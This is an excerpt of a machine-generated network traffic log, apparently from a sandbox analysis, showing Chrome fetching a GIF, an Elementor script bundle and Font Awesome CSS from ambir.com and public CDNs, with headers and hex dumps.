                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 5a 08 38 8d 97 6d 14 11 e8 12 9e 8a 28 0d 79 3d 79 f2 98 b2 0a 35 1a 91 4c b2 2b 24 a4 56 d3 fa ac aa 8b 05 eb d7 bf 7d ef 7f 9d ef f1 bf 5d 94 f7 e6 a5 20 2f 8f 0e 31 f3 45 33 eb fd 2d 75 ad 01 99 be f9 ea f1 a1 81 d5 0a d0 38 0d 04 10 ec 23 d1 01 69 d0 15 3c b9 97 cb 0f c1 2a 70 91 bf e7 16 93 d0 71 2f ef 40 3d bf 1c 88 0f 8a 1c 3b 78 f3 b0 7f c5 9a 97 c6 f6 b5 06 04 e1 a3 d7 92 9c a4 40 68 07 04 10 47 a8 56 4d 46 23 52 a9 46 41 64 93 d5 d4 f4 f5 58 55 53 89 17 af 7e be 4f 93 d6 f7 bf 5e bf 3b ef 5d 63 44 d8 dc 96 26 fc 75 78 dd 9a 4f 8f 19 47 18 02 63 ad ad 14 02 00 ae 5b 37 1d c5 c7 62 7b 19 b7 ff 00 5f 0d 93 07 ad 00 7a 0e 5b 40 26 29 67 95 96 71 f9 3c 54 51 57 c3 e7 71 52 49 c0 2c 06 cc 10 4e 45 15 bf 5b df c7 4f 01 06 2c c5 24 32 45 3c 66 57 36 48
                                                                                                                                                                                              Data Ascii: Z8m(y=y5L+$V}] /1E3-u8#i<*pq/@=;x@hGVMF#RFAdXUS~O^;]cD&uxOGc[7b{_z[@&)gq<TQWqRI,NE[O,$2E<fW6H


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              100192.168.2.549840141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:28 UTC1624OUTGET /wp-includes/images/blank.gif HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:29 UTC475INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:28 GMT
                                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                                              Content-Length: 43
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: status=not_needed
                                                                                                                                                                                              ETag: "5d98a6cb-2b"
                                                                                                                                                                                              Last-Modified: Sat, 05 Oct 2019 14:20:59 GMT
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13816
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fc8e9f343c3-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:29 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 05 0a 00 00 00 2c 00 00 00 00 01 00 01 00 40 02 02 44 01 00 3b
                                                                                                                                                                                              Data Ascii: GIF89a!,@D;


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              101192.168.2.549838199.67.80.864431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:28 UTC398OUTGET /forms/images/loader.79de1b954774690fff0e7345d82faa25.gif HTTP/1.1
                                                                                                                                                                                              Host: static.zohocdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:29 UTC741INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:29 GMT
                                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                                              Content-Length: 3322
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                              ETag: "292a10fec250aa6afd95d396510c59c5"
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Last-Modified: Fri, 29 Mar 2024 09:59:52 GMT
                                                                                                                                                                                              Access-Control-Expose-Headers: *
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              strict-transport-security: max-age=15768000
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              x-cache: HIT
                                                                                                                                                                                              nb-request-id: 7b329ea6fe48e00f9fd7b2f0d344392c
                                                                                                                                                                                              z-origin-id: sa1-f2b1313a144d43ddb0b4f2236dfc833f
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Strict-Transport-Security: max-age=64072000; includeSubDomains; preload
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:29 UTC3322INData Raw: 47 49 46 38 39 61 18 00 18 00 f7 00 00 03 03 03 06 06 06 1b 1b 1b 34 34 34 3d 3d 3d 4d 4d 4d 55 55 55 56 56 56 59 59 59 61 61 61 67 67 67 68 68 68 6c 6c 6c 7c 7c 7c 80 80 80 86 86 86 89 89 89 90 90 90 96 96 96 9a 9a 9a 9d 9d 9d a3 a3 a3 a6 a6 a6 ab ab ab af af af b2 b2 b2 b5 b5 b5 bb bb bb bc bc bc c1 c1 c1 ca ca ca cd cd cd d1 d1 d1 d5 d5 d5 d9 d9 d9 dc dc dc e3 e3 e3 e4 e4 e4 eb eb eb ed ed ed f0 f0 f0 f4 f4 f4 f8 f8 f8 00 00 00 1d 1d 1d 21 21 21 27 27 27 29 29 29 35 35 35 42 42 42 4e 4e 4e 54 54 54 5d 5d 5d 6a 6a 6a 74 74 74 7b 7b 7b 7f 7f 7f 85 85 85 8b 8b 8b 8c 8c 8c 91 91 91 95 95 95 98 98 98 a1 a1 a1 ae ae ae b1 b1 b1 b6 b6 b6 b8 b8 b8 c2 c2 c2 c7 c7 c7 c8 c8 c8 d2 d2 d2 d6 d6 d6 da da da df df df e0 e0 e0 e7 e7 e7 e8 e8 e8 ef ef ef f7 f7 f7 f9 f9
                                                                                                                                                                                              Data Ascii: GIF89a444===MMMUUUVVVYYYaaaggghhhlll|||!!!''')))555BBBNNNTTT]]]jjjttt{{{


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              102192.168.2.549841141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:28 UTC1871OUTGET /wp-content/plugins/elementor/assets/js/text-editor.2c35aafbe5bf0e127950.bundle.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:29 UTC490INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:29 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 15:42:06 GMT
                                                                                                                                                                                              ETag: W/"673e034e-550"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13817
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fca1e6343e9-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:29 UTC879INData Raw: 35 35 30 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 35 2e 30 20 2d 20 31 39 2d 31 31 2d 32 30 32 34 20 2a 2f 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 35 37 5d 2c 7b 31 33 32 37 3a 28 65 2c 74 29 3d 3e 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 76 6f 69 64 20 30 3b 63 6c 61 73 73 20 54 65 78 74 45 64 69 74 6f 72 20 65 78 74 65 6e 64 73 20 65 6c 65 6d 65 6e 74 6f 72 4d 6f 64 75 6c 65 73 2e 66 72 6f
                                                                                                                                                                                              Data Ascii: 550/*! elementor - v3.25.0 - 19-11-2024 */"use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[357],{1327:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class TextEditor extends elementorModules.fro
                                                                                                                                                                                              2024-11-20 20:28:29 UTC488INData Raw: 20 65 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 70 61 72 61 67 72 61 70 68 3b 69 66 28 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 74 3d 65 2e 68 74 6d 6c 28 29 2e 72 65 70 6c 61 63 65 28 2f 26 6e 62 73 70 3b 2f 67 2c 22 20 22 29 2c 72 3d 74 2e 6d 61 74 63 68 28 2f 5e 20 2a 28 5b 5e 20 5d 20 3f 29 2f 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 70 3d 72 5b 31 5d 2c 73 3d 70 2e 74 72 69 6d 28 29 3b 69 66 28 22 3c 22 3d 3d 3d 73 29 72 65 74 75 72 6e 3b 74 68 69 73 2e 64 72 6f 70 43 61 70 4c 65 74 74 65 72 3d 70 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 64 72 6f 70 43 61 70 4c 65 74 74 65 72 2e 74 65 78 74 28 73 29 3b 63 6f 6e 73 74 20 61 3d 74 2e 73 6c 69 63 65 28 70 2e 6c 65 6e 67 74 68 29 2e 72 65 70
                                                                                                                                                                                              Data Ascii: e=this.elements.$paragraph;if(!e.length)return;const t=e.html().replace(/&nbsp;/g," "),r=t.match(/^ *([^ ] ?)/);if(!r)return;const p=r[1],s=p.trim();if("<"===s)return;this.dropCapLetter=p,this.elements.$dropCapLetter.text(s);const a=t.slice(p.length).rep
                                                                                                                                                                                              2024-11-20 20:28:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              103192.168.2.549846104.17.25.144431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:29 UTC577OUTGET /ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css HTTP/1.1
                                                                                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:29 UTC947INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:29 GMT
                                                                                                                                                                                              Content-Type: text/css; charset=utf-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                                                                                              ETag: W/"619c057b-44be"
                                                                                                                                                                                              Last-Modified: Mon, 22 Nov 2021 21:02:51 GMT
                                                                                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 689
                                                                                                                                                                                              Expires: Mon, 10 Nov 2025 20:28:29 GMT
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zb5h%2B8aMPiZs%2FeZEfV%2FIHYNh3jzfy%2B06sN9ObPkvzaE3jKsIRWqzbrdpJIc3bpoMaovJq95kkyPzE2nSQpCPN%2BghiDmgcxTjzsFlWSL%2BThirljZbXQpDCqE4fczmkNZ8xlinHceC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fcaf8a4438d-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:29 UTC422INData Raw: 37 62 66 64 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 30 2e 30 2d 62 65 74 61 33 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 31 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61
                                                                                                                                                                                              Data Ascii: 7bfd/*! * Font Awesome Free 6.0.0-beta3 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2021 Fonticons, Inc. */.fa{font-family:var(--fa
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d
                                                                                                                                                                                              Data Ascii: -moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61
                                                                                                                                                                                              Data Ascii: ar(--fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0);animation-delay:var(--fa-animation-delay,0);-webkit-animation-direction:var(--fa-animation-direction,normal);anima
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 7d 2e 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61
                                                                                                                                                                                              Data Ascii: ration,1s);animation-duration:var(--fa-animation-duration,1s)}.fa-beat-fade{-webkit-animation-name:fa-beat-fade;animation-name:fa-beat-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-a
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75
                                                                                                                                                                                              Data Ascii: ction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,2s);animation-duration:var(--fa-animation-duration,2s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-cou
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 69 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 73 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d
                                                                                                                                                                                              Data Ascii: ition-delay:0s;transition-delay:0s;-webkit-transition-duration:0s;transition-duration:0s}}@-webkit-keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-
